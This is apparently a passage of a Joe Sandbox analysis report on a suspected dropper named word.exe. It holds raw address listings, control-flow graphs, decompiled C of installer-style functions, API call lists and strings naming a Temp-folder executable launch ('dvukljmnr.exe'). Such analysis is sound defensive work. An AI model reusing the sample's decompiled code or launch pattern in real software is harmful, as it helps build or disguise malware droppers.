                                                          0x004066d0
                                                          0x004066d3
                                                          0x00000000
                                                          0x00000000
                                                          0x00406867
                                                          0x0040686a
                                                          0x00000000
                                                          0x00000000
                                                          0x004064a1
                                                          0x004064a3
                                                          0x004064aa
                                                          0x004064ab
                                                          0x004064ad
                                                          0x004064b0
                                                          0x00000000
                                                          0x00000000
                                                          0x004064b8
                                                          0x004064bb
                                                          0x004064be
                                                          0x004064c0
                                                          0x004064c2
                                                          0x004064c2
                                                          0x004064c3
                                                          0x004064c6
                                                          0x004064cd
                                                          0x004064d0
                                                          0x004064de
                                                          0x00000000
                                                          0x00000000
                                                          0x004067b4
                                                          0x004067b4
                                                          0x004067b7
                                                          0x004067be
                                                          0x00000000
                                                          0x00000000
                                                          0x004067c3
                                                          0x004067c3
                                                          0x004067c7
                                                          0x004068ff
                                                          0x00000000
                                                          0x004068ff
                                                          0x004067cd
                                                          0x004067d0
                                                          0x004067d3
                                                          0x004067d7
                                                          0x004067da
                                                          0x004067e0
                                                          0x004067e2
                                                          0x004067e2
                                                          0x004067e2
                                                          0x004067e5
                                                          0x004067e8
                                                          0x004067e8
                                                          0x004067e8
                                                          0x004067e8
                                                          0x004067eb
                                                          0x004067eb
                                                          0x004067ef
                                                          0x0040684f
                                                          0x00406852
                                                          0x00406857
                                                          0x00406858
                                                          0x0040685a
                                                          0x0040685c
                                                          0x0040685f
                                                          0x00000000
                                                          0x0040685f
                                                          0x004067f1
                                                          0x004067f7
                                                          0x004067fa
                                                          0x004067fd
                                                          0x00406800
                                                          0x00406803
                                                          0x00406806
                                                          0x00406809
                                                          0x0040680c
                                                          0x0040680f
                                                          0x00406812
                                                          0x0040682b
                                                          0x0040682e
                                                          0x00406831
                                                          0x00406834
                                                          0x00406838
                                                          0x0040683a
                                                          0x0040683a
                                                          0x0040683b
                                                          0x0040683e
                                                          0x00406814
                                                          0x00406814
                                                          0x0040681c
                                                          0x00406821
                                                          0x00406823
                                                          0x00406826
                                                          0x00406826
                                                          0x00406841
                                                          0x00406848
                                                          0x00000000
                                                          0x0040684a
                                                          0x00000000
                                                          0x0040684a
                                                          0x00000000
                                                          0x004064e6
                                                          0x004064e9
                                                          0x0040651f
                                                          0x0040664f
                                                          0x0040664f
                                                          0x0040664f
                                                          0x0040664f
                                                          0x00406652
                                                          0x00406652
                                                          0x00406655
                                                          0x00406657
                                                          0x004068e1
                                                          0x00000000
                                                          0x004068e1
                                                          0x0040665d
                                                          0x00406660
                                                          0x00000000
                                                          0x00000000
                                                          0x00406666
                                                          0x0040666a
                                                          0x0040666d
                                                          0x0040666d
                                                          0x0040666d
                                                          0x00000000
                                                          0x0040666d
                                                          0x004064eb
                                                          0x004064ed
                                                          0x004064ef
                                                          0x004064f1
                                                          0x004064f4
                                                          0x004064f5
                                                          0x004064f7
                                                          0x004064f9
                                                          0x004064fc
                                                          0x004064ff
                                                          0x00406515
                                                          0x0040651a
                                                          0x00406552
                                                          0x00406552
                                                          0x00406556
                                                          0x00406582
                                                          0x00406584
                                                          0x0040658b
                                                          0x0040658e
                                                          0x00406591
                                                          0x00406591
                                                          0x00406596
                                                          0x00406596
                                                          0x00406598
                                                          0x0040659b
                                                          0x004065a2
                                                          0x004065a5
                                                          0x004065d2
                                                          0x004065d2
                                                          0x004065d5
                                                          0x004065d8
                                                          0x0040664c
                                                          0x0040664c
                                                          0x0040664c
                                                          0x00000000
                                                          0x0040664c
                                                          0x004065da
                                                          0x004065e0
                                                          0x004065e3
                                                          0x004065e6
                                                          0x004065e9
                                                          0x004065ec
                                                          0x004065ef
                                                          0x004065f2
                                                          0x004065f5
                                                          0x004065f8
                                                          0x004065fb
                                                          0x00406614
                                                          0x00406616
                                                          0x00406619
                                                          0x0040661a
                                                          0x0040661d
                                                          0x0040661f
                                                          0x00406622
                                                          0x00406624
                                                          0x00406626
                                                          0x00406629
                                                          0x0040662b
                                                          0x0040662e
                                                          0x00406632
                                                          0x00406634
                                                          0x00406634
                                                          0x00406635
                                                          0x00406638
                                                          0x0040663b
                                                          0x004065fd
                                                          0x004065fd
                                                          0x00406605
                                                          0x0040660a
                                                          0x0040660c
                                                          0x0040660f
                                                          0x0040660f
                                                          0x0040663e
                                                          0x00406645
                                                          0x004065cf
                                                          0x004065cf
                                                          0x004065cf
                                                          0x004065cf
                                                          0x00000000
                                                          0x00406647
                                                          0x00000000
                                                          0x00406647
                                                          0x00406645
                                                          0x00406558
                                                          0x0040655b
                                                          0x0040655d
                                                          0x00406560
                                                          0x00406563
                                                          0x00406566
                                                          0x00406568
                                                          0x0040656b
                                                          0x0040656e
                                                          0x0040656e
                                                          0x00406571
                                                          0x00406571
                                                          0x00406574
                                                          0x0040657b
                                                          0x0040654f
                                                          0x0040654f
                                                          0x0040654f
                                                          0x0040654f
                                                          0x00000000
                                                          0x0040657d
                                                          0x00000000
                                                          0x0040657d
                                                          0x0040657b
                                                          0x00406501
                                                          0x00406504
                                                          0x00406506
                                                          0x00406509
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x004063f3
                                                          0x004063f3
                                                          0x004063f7
                                                          0x004068bd
                                                          0x00000000
                                                          0x004068bd
                                                          0x004063fd
                                                          0x00406400
                                                          0x00406403
                                                          0x00406406
                                                          0x00406408
                                                          0x00406408
                                                          0x00406408
                                                          0x0040640b
                                                          0x0040640e
                                                          0x00406411
                                                          0x00406414
                                                          0x00406417
                                                          0x0040641a
                                                          0x0040641b
                                                          0x0040641d
                                                          0x0040641d
                                                          0x0040641d
                                                          0x00406420
                                                          0x00406423
                                                          0x00406426
                                                          0x00406429
                                                          0x00406429
                                                          0x00406429
                                                          0x0040642c
                                                          0x00000000
                                                          0x00000000
                                                          0x00406670
                                                          0x00406670
                                                          0x00406670
                                                          0x00406674
                                                          0x00000000
                                                          0x00000000
                                                          0x0040667a
                                                          0x0040667d
                                                          0x00406680
                                                          0x00406683
                                                          0x00406685
                                                          0x00406685
                                                          0x00406685
                                                          0x00406688
                                                          0x0040668b
                                                          0x0040668e
                                                          0x00406691
                                                          0x00406694
                                                          0x00406697
                                                          0x00406698
                                                          0x0040669a
                                                          0x0040669a
                                                          0x0040669a
                                                          0x0040669d
                                                          0x004066a0
                                                          0x004066a3
                                                          0x004066a6
                                                          0x004066a9
                                                          0x004066ad
                                                          0x004066af
                                                          0x004066b2
                                                          0x00000000
                                                          0x004066b4
                                                          0x00000000
                                                          0x004066b4
                                                          0x004066b2
                                                          0x004068e7
                                                          0x00000000
                                                          0x00000000
                                                          0x00405f16

                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.945445823.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000004.00000002.945441190.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000004.00000002.945456325.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000004.00000002.945466320.0000000000409000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000004.00000002.945471014.000000000040B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000004.00000002.945488429.0000000000421000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000004.00000002.945497852.0000000000429000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000004.00000002.945504833.000000000042C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_400000_word.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 4e74e6640404211f02dbcf3e5cdd51f183378cde3108f959ef2b494a3a8ff7bc
                                                          • Instruction ID: eeb6df0b4c754b004cb91f1e651764525fca86d3ed66ed31f7f656e6c0f0dc00
                                                          • Opcode Fuzzy Hash: 4e74e6640404211f02dbcf3e5cdd51f183378cde3108f959ef2b494a3a8ff7bc
                                                          • Instruction Fuzzy Hash: B7F17671D00269CBDF28CFA8C8946ADBBB0FF44305F25816ED856BB281D7385A96DF44
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 004036A1 Relevance: 49.2, APIs: 15, Strings: 13, Instructions: 213stringregistrylibraryCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 104 4036a1-4036b9 call 405dda 107 4036bb-4036cb call 405a52 104->107 108 4036cd-4036f4 call 4059db 104->108 116 403717-403736 call 403955 call 4056c8 107->116 112 4036f6-403707 call 4059db 108->112 113 40370c-403712 lstrcatA 108->113 112->113 113->116 122 40373c-403741 116->122 123 4037bd-4037c5 call 4056c8 116->123 122->123 124 403743-403767 call 4059db 122->124 129 4037d3-4037f8 LoadImageA 123->129 130 4037c7-4037ce call 405b16 123->130 124->123 133 403769-40376b 124->133 131 403887-40388f call 40140b 129->131 132 4037fe-403834 RegisterClassA 129->132 130->129 146 403891-403894 131->146 147 403899-4038a4 call 403955 131->147 135 40383a-403882 SystemParametersInfoA CreateWindowExA 132->135 136 40394b 132->136 138 40377c-403788 lstrlenA 133->138 139 40376d-40377a call 405612 133->139 135->131 143 40394d-403954 136->143 140 4037b0-4037b8 call 4055e7 call 405af4 138->140 141 40378a-403798 lstrcmpiA 138->141 139->138 140->123 141->140 145 40379a-4037a4 GetFileAttributesA 141->145 150 4037a6-4037a8 145->150 151 4037aa-4037ab call 40562e 145->151 146->143 157 403922-40392a call 404f71 147->157 158 4038a6-4038c3 ShowWindow LoadLibraryA 147->158 150->140 150->151 151->140 165 403944-403946 call 40140b 157->165 166 40392c-403932 157->166 160 4038c5-4038ca LoadLibraryA 158->160 161 4038cc-4038de GetClassInfoA 158->161 160->161 163 4038e0-4038f0 GetClassInfoA RegisterClassA 161->163 164 4038f6-403919 DialogBoxParamA call 40140b 161->164 163->164 170 40391e-403920 164->170 165->136 166->146 168 403938-40393f call 40140b 166->168 168->146 170->143
                                                          C-Code - Quality: 89%
                                                          			E004036A1() {
				intOrPtr _v4;
				intOrPtr _v8;
				int _v12;
				int _v16;
				char _v20;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr* _t20;
				void* _t28;
				void* _t30;
				int _t31;
				void* _t34;
				struct HINSTANCE__* _t37;
				int _t38;
				int _t42;
				char _t61;
				CHAR* _t63;
				signed char _t67;
				CHAR* _t78;
				intOrPtr _t80;
				CHAR* _t84;
				CHAR* _t85;

				_t80 =  *0x423f28;
				_t20 = E00405DDA(6);
				_t87 = _t20;
				if(_t20 == 0) {
					_t78 = 0x420530;
					"1033" = 0x7830;
					E004059DB(0x80000001, "Control Panel\\Desktop\\ResourceLocale", 0, 0x420530, 0);
					__eflags =  *0x420530;
					if(__eflags == 0) {
						E004059DB(0x80000003, ".DEFAULT\\Control Panel\\International",  &M004072FE, 0x420530, 0);
					}
					lstrcatA("1033", _t78);
				} else {
					E00405A52("1033",  *_t20() & 0x0000ffff);
				}
				E00403955(_t75, _t87);
				_t84 = "C:\\Users\\Albus\\AppData\\Local\\Temp";
				 *0x423fa0 =  *0x423f30 & 0x00000020;
				if(E004056C8(_t87, _t84) != 0) {
					L16:
					if(E004056C8(_t95, _t84) == 0) {
						_push( *((intOrPtr*)(_t80 + 0x118)));
						_push(_t84);
						E00405B16(0, _t78, _t80);
					}
					_t28 = LoadImageA( *0x423f20, 0x67, 1, 0, 0, 0x8040);
					 *0x423708 = _t28;
					if( *((intOrPtr*)(_t80 + 0x50)) == 0xffffffff) {
						L21:
						if(E0040140B(0) == 0) {
							_t30 = E00403955(_t75, __eflags);
							__eflags =  *0x423fc0;
							if( *0x423fc0 != 0) {
								_t31 = E00404F71(_t30, 0);
								__eflags = _t31;
								if(_t31 == 0) {
									E0040140B(1);
									goto L33;
								}
								__eflags =  *0x4236ec;
								if( *0x4236ec == 0) {
									E0040140B(2);
								}
								goto L22;
							}
							ShowWindow( *0x420508, 5); // executed
							_t37 = LoadLibraryA("RichEd20"); // executed
							__eflags = _t37;
							if(_t37 == 0) {
								LoadLibraryA("RichEd32");
							}
							_t85 = "RichEdit20A";
							_t38 = GetClassInfoA(0, _t85, 0x4236c0);
							__eflags = _t38;
							if(_t38 == 0) {
								GetClassInfoA(0, "RichEdit", 0x4236c0);
								 *0x4236e4 = _t85;
								RegisterClassA(0x4236c0);
							}
							_t42 = DialogBoxParamA( *0x423f20,  *0x423700 + 0x00000069 & 0x0000ffff, 0, E00403A22, 0); // executed
							E0040140B(5);
							return _t42;
						}
						L22:
						_t34 = 2;
						return _t34;
					} else {
						_t75 =  *0x423f20;
						 *0x4236d4 = _t28;
						_v20 = 0x624e5f;
						 *0x4236c4 = E00401000;
						 *0x4236d0 =  *0x423f20;
						 *0x4236e4 =  &_v20;
						if(RegisterClassA(0x4236c0) == 0) {
							L33:
							__eflags = 0;
							return 0;
						}
						_t12 =  &_v16; // 0x624e5f
						SystemParametersInfoA(0x30, 0, _t12, 0);
						 *0x420508 = CreateWindowExA(0x80,  &_v20, 0, 0x80000000, _v16, _v12, _v8 - _v16, _v4 - _v12, 0, 0,  *0x423f20, 0);
						goto L21;
					}
				} else {
					_t75 =  *(_t80 + 0x48);
					if(_t75 == 0) {
						goto L16;
					}
					_t78 = 0x422ec0;
					E004059DB( *((intOrPtr*)(_t80 + 0x44)), _t75,  *((intOrPtr*)(_t80 + 0x4c)) +  *0x423f58, 0x422ec0, 0);
					_t61 =  *0x422ec0; // 0x43
					if(_t61 == 0) {
						goto L16;
					}
					if(_t61 == 0x22) {
						_t78 = 0x422ec1;
						 *((char*)(E00405612(0x422ec1, 0x22))) = 0;
					}
					_t63 = lstrlenA(_t78) + _t78 - 4;
					if(_t63 <= _t78 || lstrcmpiA(_t63, ?str?) != 0) {
						L15:
						E00405AF4(_t84, E004055E7(_t78));
						goto L16;
					} else {
						_t67 = GetFileAttributesA(_t78);
						if(_t67 == 0xffffffff) {
							L14:
							E0040562E(_t78);
							goto L15;
						}
						_t95 = _t67 & 0x00000010;
						if((_t67 & 0x00000010) != 0) {
							goto L15;
						}
						goto L14;
					}
				}
			}


























                                                          0x004036a7
                                                          0x004036b0
                                                          0x004036b7
                                                          0x004036b9
                                                          0x004036cd
                                                          0x004036df
                                                          0x004036e9
                                                          0x004036ee
                                                          0x004036f4
                                                          0x00403707
                                                          0x00403707
                                                          0x00403712
                                                          0x004036bb
                                                          0x004036c6
                                                          0x004036c6
                                                          0x00403717
                                                          0x00403721
                                                          0x0040372a
                                                          0x00403736
                                                          0x004037bd
                                                          0x004037c5
                                                          0x004037c7
                                                          0x004037cd
                                                          0x004037ce
                                                          0x004037ce
                                                          0x004037e4
                                                          0x004037ea
                                                          0x004037f8
                                                          0x00403887
                                                          0x0040388f
                                                          0x00403899
                                                          0x0040389e
                                                          0x004038a4
                                                          0x00403923
                                                          0x00403928
                                                          0x0040392a
                                                          0x00403946
                                                          0x00000000
                                                          0x00403946
                                                          0x0040392c
                                                          0x00403932
                                                          0x0040393a
                                                          0x0040393a
                                                          0x00000000
                                                          0x00403932
                                                          0x004038ae
                                                          0x004038bf
                                                          0x004038c1
                                                          0x004038c3
                                                          0x004038ca
                                                          0x004038ca
                                                          0x004038d2
                                                          0x004038da
                                                          0x004038dc
                                                          0x004038de
                                                          0x004038e7
                                                          0x004038ea
                                                          0x004038f0
                                                          0x004038f0
                                                          0x0040390f
                                                          0x00403919
                                                          0x00000000
                                                          0x0040391e
                                                          0x00403891
                                                          0x00403893
                                                          0x00000000
                                                          0x004037fe
                                                          0x004037fe
                                                          0x00403804
                                                          0x0040380e
                                                          0x00403816
                                                          0x00403820
                                                          0x00403826
                                                          0x00403834
                                                          0x0040394b
                                                          0x0040394b
                                                          0x00000000
                                                          0x0040394b
                                                          0x0040383a
                                                          0x00403843
                                                          0x00403882
                                                          0x00000000
                                                          0x00403882
                                                          0x0040373c
                                                          0x0040373c
                                                          0x00403741
                                                          0x00000000
                                                          0x00000000
                                                          0x0040374b
                                                          0x0040375b
                                                          0x00403760
                                                          0x00403767
                                                          0x00000000
                                                          0x00000000
                                                          0x0040376b
                                                          0x0040376d
                                                          0x0040377a
                                                          0x0040377a
                                                          0x00403782
                                                          0x00403788
                                                          0x004037b0
                                                          0x004037b8
                                                          0x00000000
                                                          0x0040379a
                                                          0x0040379b
                                                          0x004037a4
                                                          0x004037aa
                                                          0x004037ab
                                                          0x00000000
                                                          0x004037ab
                                                          0x004037a6
                                                          0x004037a8
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x004037a8
                                                          0x00403788

                                                          APIs
                                                            • Part of subcall function 00405DDA: GetModuleHandleA.KERNEL32(4B004178,?,00000000,0040584D,00000001,?,00000000,?,?,004055D7,?,00000000,000000F1,?), ref: 00405DEC
                                                            • Part of subcall function 00405DDA: LoadLibraryA.KERNEL32(4B004178), ref: 00405DF7
                                                            • Part of subcall function 00405DDA: GetProcAddress.KERNEL32(00000000,454E5245,?,00000000,0040584D,00000001,?,00000000,?,?,004055D7,?,00000000,000000F1,?), ref: 00405E08
                                                          • lstrcatA.KERNEL32(1033,00420530,80000001,Control Panel\Desktop\ResourceLocale,00000000,00420530,00000000,00000006,C:\Users\user\AppData\Roaming\word.exe,00000000,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00403712
                                                          • lstrlenA.KERNEL32(C:\Users\user\AppData\Local\Temp\dvukljmnr.exe C:\Users\user\AppData\Local\Temp\xxsjdcnfw,?,?,?,C:\Users\user\AppData\Local\Temp\dvukljmnr.exe C:\Users\user\AppData\Local\Temp\xxsjdcnfw,00000000,C:\Users\user\AppData\Local\Temp,1033,00420530,80000001,Control Panel\Desktop\ResourceLocale,00000000,00420530,00000000,00000006,C:\Users\user\AppData\Roaming\word.exe), ref: 0040377D
                                                          • lstrcmpiA.KERNEL32(?,.exe,C:\Users\user\AppData\Local\Temp\dvukljmnr.exe C:\Users\user\AppData\Local\Temp\xxsjdcnfw,?,?,?,C:\Users\user\AppData\Local\Temp\dvukljmnr.exe C:\Users\user\AppData\Local\Temp\xxsjdcnfw,00000000,C:\Users\user\AppData\Local\Temp,1033,00420530,80000001,Control Panel\Desktop\ResourceLocale,00000000,00420530,00000000), ref: 00403790
                                                          • GetFileAttributesA.KERNEL32(C:\Users\user\AppData\Local\Temp\dvukljmnr.exe C:\Users\user\AppData\Local\Temp\xxsjdcnfw), ref: 0040379B
                                                          • LoadImageA.USER32(00000067,00000001,00000000,00000000,00008040,C:\Users\user\AppData\Local\Temp), ref: 004037E4
                                                            • Part of subcall function 00405A52: wsprintfA.USER32 ref: 00405A5F
                                                          • RegisterClassA.USER32 ref: 0040382B
                                                          • SystemParametersInfoA.USER32(00000030,00000000,_Nb,00000000), ref: 00403843
                                                          • CreateWindowExA.USER32 ref: 0040387C
                                                          • ShowWindow.USER32(00000005,00000000), ref: 004038AE
                                                          • LoadLibraryA.KERNEL32(RichEd20), ref: 004038BF
                                                          • LoadLibraryA.KERNEL32(RichEd32), ref: 004038CA
                                                          • GetClassInfoA.USER32(00000000,RichEdit20A,004236C0), ref: 004038DA
                                                          • GetClassInfoA.USER32(00000000,RichEdit,004236C0), ref: 004038E7
                                                          • RegisterClassA.USER32(004236C0), ref: 004038F0
                                                          • DialogBoxParamA.USER32 ref: 0040390F
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.945445823.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000004.00000002.945441190.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000004.00000002.945456325.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000004.00000002.945466320.0000000000409000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000004.00000002.945471014.000000000040B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000004.00000002.945488429.0000000000421000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000004.00000002.945497852.0000000000429000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000004.00000002.945504833.000000000042C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_400000_word.jbxd
                                                          Similarity
                                                          • API ID: ClassLoad$InfoLibrary$RegisterWindow$AddressAttributesCreateDialogFileHandleImageModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
                                                          • String ID: .DEFAULT\Control Panel\International$.exe$1033$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\dvukljmnr.exe C:\Users\user\AppData\Local\Temp\xxsjdcnfw$C:\Users\user\AppData\Roaming\word.exe$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20A$_Nb
                                                          • API String ID: 914957316-253077893
                                                          • Opcode ID: 94a7eb4746df920d3ed3100e7a30cdef3532f41083eceb960059c7bdc3c8b9cf
                                                          • Instruction ID: 396c3099e5e99d0af67321f2f40d51cf7d39f14f72ddbb9a737c40d3af2db82b
                                                          • Opcode Fuzzy Hash: 94a7eb4746df920d3ed3100e7a30cdef3532f41083eceb960059c7bdc3c8b9cf
                                                          • Instruction Fuzzy Hash: 5261C6B1704200BBD620AF61AD45F3B3ABDEB4474AB50447FF941B22E1D77CA9458A3E
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 00403A22 Relevance: 48.3, APIs: 32, Instructions: 345windowstringCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 173 403a22-403a34 174 403b75-403b84 173->174 175 403a3a-403a40 173->175 177 403bd3-403be8 174->177 178 403b86-403bce GetDlgItem * 2 call 403ef5 SetClassLongA call 40140b 174->178 175->174 176 403a46-403a4f 175->176 179 403a51-403a5e SetWindowPos 176->179 180 403a64-403a67 176->180 182 403c28-403c2d call 403f41 177->182 183 403bea-403bed 177->183 178->177 179->180 184 403a81-403a87 180->184 185 403a69-403a7b ShowWindow 180->185 190 403c32-403c4d 182->190 187 403c20-403c22 183->187 188 403bef-403bfa call 401389 183->188 191 403aa3-403aa6 184->191 192 403a89-403a9e DestroyWindow 184->192 185->184 187->182 195 403ec2 187->195 188->187 210 403bfc-403c1b SendMessageA 188->210 196 403c56-403c5c 190->196 197 403c4f-403c51 call 40140b 190->197 201 403aa8-403ab4 SetWindowLongA 191->201 202 403ab9-403abf 191->202 199 403e9f-403ea5 192->199 198 403ec4-403ecb 195->198 206 403e80-403e99 DestroyWindow EndDialog 196->206 207 403c62-403c6d 196->207 197->196 199->195 204 403ea7-403ead 199->204 201->198 208 403b62-403b70 call 403f5c 202->208 209 403ac5-403ad6 GetDlgItem 202->209 204->195 211 403eaf-403eb8 ShowWindow 204->211 206->199 207->206 212 403c73-403cc0 call 405b16 call 403ef5 * 3 GetDlgItem 207->212 208->198 213 403af5-403af8 209->213 214 403ad8-403aef SendMessageA IsWindowEnabled 209->214 210->198 211->195 243 403cc2-403cc7 212->243 244 403cca-403d06 ShowWindow EnableWindow call 403f17 EnableWindow 212->244 218 403afa-403afb 213->218 219 403afd-403b00 213->219 214->195 214->213 221 403b2b-403b30 call 403ece 218->221 222 403b02-403b08 219->222 223 403b0e-403b13 219->223 221->208 225 403b49-403b5c SendMessageA 222->225 228 403b0a-403b0c 222->228 224 403b15-403b1b 223->224 223->225 229 403b32-403b3b call 40140b 224->229 230 403b1d-403b23 call 40140b 224->230 225->208 228->221 229->208 240 403b3d-403b47 229->240 239 403b29 230->239 239->221 240->239 243->244 247 403d08-403d09 244->247 248 403d0b 244->248 249 403d0d-403d3b GetSystemMenu EnableMenuItem SendMessageA 247->249 248->249 250 403d50 249->250 251 403d3d-403d4e SendMessageA 249->251 252 403d56-403d8f call 403f2a call 405af4 lstrlenA call 405b16 SetWindowTextA call 401389 250->252 251->252 252->190 261 403d95-403d97 252->261 261->190 262 403d9d-403da1 261->262 263 403dc0-403dd4 DestroyWindow 262->263 264 403da3-403da9 262->264 263->199 266 403dda-403e07 CreateDialogParamA 263->266 264->195 265 403daf-403db5 264->265 265->190 267 403dbb 265->267 266->199 268 403e0d-403e64 call 403ef5 GetDlgItem GetWindowRect ScreenToClient SetWindowPos call 401389 266->268 267->195 268->195 273 403e66-403e7e ShowWindow call 403f41 268->273 273->199
                                                          C-Code - Quality: 77%
                                                          			E00403A22(struct HWND__* _a4, signed int _a8, int _a12, long _a16) {
				struct HWND__* _v32;
				void* _v80;
				void* _v84;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t35;
				signed int _t37;
				signed int _t39;
				struct HWND__* _t49;
				signed int _t67;
				struct HWND__* _t73;
				signed int _t86;
				struct HWND__* _t91;
				signed int _t99;
				int _t103;
				signed int _t115;
				signed int _t116;
				int _t117;
				signed int _t122;
				struct HWND__* _t125;
				struct HWND__* _t126;
				int _t127;
				long _t130;
				int _t132;
				int _t133;
				void* _t134;
				void* _t141;

				_t115 = _a8;
				if(_t115 == 0x110 || _t115 == 0x408) {
					_t35 = _a12;
					_t125 = _a4;
					__eflags = _t115 - 0x110;
					 *0x420514 = _t35;
					if(_t115 == 0x110) {
						 *0x423f24 = _t125;
						 *0x420528 = GetDlgItem(_t125, 1);
						_t91 = GetDlgItem(_t125, 2);
						_push(0xffffffff);
						_push(0x1c);
						 *0x41f4f0 = _t91;
						E00403EF5(_t125);
						SetClassLongA(_t125, 0xfffffff2,  *0x423708);
						 *0x4236ec = E0040140B(4);
						_t35 = 1;
						__eflags = 1;
						 *0x420514 = 1;
					}
					_t122 =  *0x409238; // 0x0
					_t133 = 0;
					_t130 = (_t122 << 6) +  *0x423f40;
					__eflags = _t122;
					if(_t122 < 0) {
						L34:
						E00403F41(0x40b);
						while(1) {
							_t37 =  *0x420514;
							 *0x409238 =  *0x409238 + _t37;
							_t130 = _t130 + (_t37 << 6);
							_t39 =  *0x409238; // 0x0
							__eflags = _t39 -  *0x423f44;
							if(_t39 ==  *0x423f44) {
								E0040140B(1);
							}
							__eflags =  *0x4236ec - _t133;
							if( *0x4236ec != _t133) {
								break;
							}
							__eflags =  *0x409238 -  *0x423f44; // 0x0
							if(__eflags >= 0) {
								break;
							}
							_push( *((intOrPtr*)(_t130 + 0x24)));
							_t116 =  *(_t130 + 0x14);
							_push(0x42b800);
							E00405B16(_t116, _t125, _t130);
							_push( *((intOrPtr*)(_t130 + 0x20)));
							_push(0xfffffc19);
							E00403EF5(_t125);
							_push( *((intOrPtr*)(_t130 + 0x1c)));
							_push(0xfffffc1b);
							E00403EF5(_t125);
							_push( *((intOrPtr*)(_t130 + 0x28)));
							_push(0xfffffc1a);
							E00403EF5(_t125);
							_t49 = GetDlgItem(_t125, 3);
							__eflags =  *0x423fac - _t133;
							_v32 = _t49;
							if( *0x423fac != _t133) {
								_t116 = _t116 & 0x0000fefd | 0x00000004;
								__eflags = _t116;
							}
							ShowWindow(_t49, _t116 & 0x00000008);
							EnableWindow( *(_t134 + 0x30), _t116 & 0x00000100);
							E00403F17(_t116 & 0x00000002);
							_t117 = _t116 & 0x00000004;
							EnableWindow( *0x41f4f0, _t117);
							__eflags = _t117 - _t133;
							if(_t117 == _t133) {
								_push(1);
							} else {
								_push(_t133);
							}
							EnableMenuItem(GetSystemMenu(_t125, _t133), 0xf060, ??);
							SendMessageA( *(_t134 + 0x38), 0xf4, _t133, 1);
							__eflags =  *0x423fac - _t133;
							if( *0x423fac == _t133) {
								_push( *0x420528);
							} else {
								SendMessageA(_t125, 0x401, 2, _t133);
								_push( *0x41f4f0);
							}
							E00403F2A();
							E00405AF4(0x420530, 0x423720);
							_push( *((intOrPtr*)(_t130 + 0x18)));
							_push( &(0x420530[lstrlenA(0x420530)]));
							E00405B16(0x420530, _t125, _t130);
							SetWindowTextA(_t125, 0x420530);
							_t67 = E00401389( *((intOrPtr*)(_t130 + 8)), _t133);
							__eflags = _t67;
							if(_t67 != 0) {
								continue;
							} else {
								__eflags =  *_t130 - _t133;
								if( *_t130 == _t133) {
									continue;
								}
								__eflags =  *(_t130 + 4) - 5;
								if( *(_t130 + 4) != 5) {
									DestroyWindow( *0x4236f8);
									 *0x41fd00 = _t130;
									__eflags =  *_t130 - _t133;
									if( *_t130 <= _t133) {
										goto L58;
									}
									_t73 = CreateDialogParamA( *0x423f20,  *_t130 +  *0x423700 & 0x0000ffff, _t125,  *( *(_t130 + 4) * 4 + "=@@"), _t130);
									__eflags = _t73 - _t133;
									 *0x4236f8 = _t73;
									if(_t73 == _t133) {
										goto L58;
									}
									_push( *((intOrPtr*)(_t130 + 0x2c)));
									_push(6);
									E00403EF5(_t73);
									GetWindowRect(GetDlgItem(_t125, 0x3fa), _t134 + 0x10);
									ScreenToClient(_t125, _t134 + 0x10);
									SetWindowPos( *0x4236f8, _t133,  *(_t134 + 0x20),  *(_t134 + 0x20), _t133, _t133, 0x15);
									E00401389( *((intOrPtr*)(_t130 + 0xc)), _t133);
									__eflags =  *0x4236ec - _t133;
									if( *0x4236ec != _t133) {
										goto L61;
									}
									ShowWindow( *0x4236f8, 8);
									E00403F41(0x405);
									goto L58;
								}
								__eflags =  *0x423fac - _t133;
								if( *0x423fac != _t133) {
									goto L61;
								}
								__eflags =  *0x423fa0 - _t133;
								if( *0x423fa0 != _t133) {
									continue;
								}
								goto L61;
							}
						}
						DestroyWindow( *0x4236f8); // executed
						 *0x423f24 = _t133;
						EndDialog(_t125,  *0x41f8f8);
						goto L58;
					} else {
						__eflags = _t35 - 1;
						if(_t35 != 1) {
							L33:
							__eflags =  *_t130 - _t133;
